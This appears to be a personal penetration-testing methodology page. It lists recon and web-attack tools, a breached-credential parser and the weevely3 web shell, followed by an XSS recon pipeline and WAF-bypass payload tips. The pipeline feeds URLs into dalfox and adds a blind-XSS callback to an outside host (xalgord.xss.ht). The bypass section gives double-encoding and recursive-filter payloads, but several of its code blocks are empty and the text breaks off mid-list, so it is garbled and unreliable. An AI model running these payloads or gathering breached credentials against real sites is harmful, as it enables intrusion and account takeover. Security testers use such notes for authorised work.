---
description: 'description: For Personal Reference'
---
# 🧑🏫 My Methodologies
* https://github.com/maurosoria/dirsearch
* https://github.com/MobSF/Mobile-Security-Framework-MobSF
* https://github.com/DanMcInerney/xsscrapy
* Burp Suite
* SecLists
* whatcms
* Striker
* OWASP ZAP
* Dirb
* Scrapy
* Dirbuster
* Gobuster
* Wfuzz
* CyberChef
* Sublist3r
* Massdns
* Dnsenum
* Knockpy
* nmap
* Masscan
* Sn1per
* XSStrike
* Sqlmap
* Wpscan
* Joomscan
* CMSmap
* Builtwith
* Wappalyzer
* wafw00f
* passive hunter
* a-mass
* subfinder
* httpx
* aquatone
* dalfox
* nuclei
* open redirect x
* massdns
* paramspider
#### Gathering Breached Credentials
* [https://github.com/hmaverickadams/breach-parse](https://github.com/hmaverickadams/breach-parse)
#### file upload vulnerability test
* [https://github.com/epinna/weevely3](https://github.com/epinna/weevely3)
#### XSS recon methodology
▶ cat domains.txt | waybackurls > urls
```
cat urls.txt --> read the file
| kxss --> filter special characters
| sed 's/=.*/=/' --> remove everything after = ,add =
| sed 's/URL: //' --> remove URL: and white space
| dalfox pipe --> dalfox tool for xss payload
-b xalgord.xss.ht --> BXSS payload adder.
```
#### KXSS
The vulnerable parameter for XSS should have Unfiltered : **\[“ ‘ < > $ | ( ) \` : ; { } ]**
**Payload:**
```
">
```
2. Try to break firewall regex with new line (\r\n), aka. CRLF injection:
```
```
3. Try double encoding:
```
%2522
```
4. Testing for recursive filters, if firewall removes the text in bold, we will have clear payload:
```
ipt>alert(1);ipt>
```
5. Injecting anchor tag without whitespaces:
```
```
6. Try to bypass whitespaces using a bullet:
```